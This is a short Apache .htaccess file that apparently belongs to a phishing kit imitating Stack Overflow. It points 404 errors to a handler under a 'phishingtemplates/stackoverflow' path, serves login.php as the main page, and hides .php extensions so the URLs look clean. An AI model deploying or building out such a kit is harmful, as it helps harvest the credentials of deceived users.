# Set custom 404 page
ErrorDocument 404 /phishingtemplates/stackoverflow/errorhandler/404.php

# Set main page
DirectoryIndex login.php

# REMOVE .php / .html Extensions
RewriteEngine On
RewriteCond %{REQUEST_FILENAME} !-d
RewriteCond %{REQUEST_FILENAME}\.php -f
RewriteRule ^(.*)$ $1.php [NC,L]
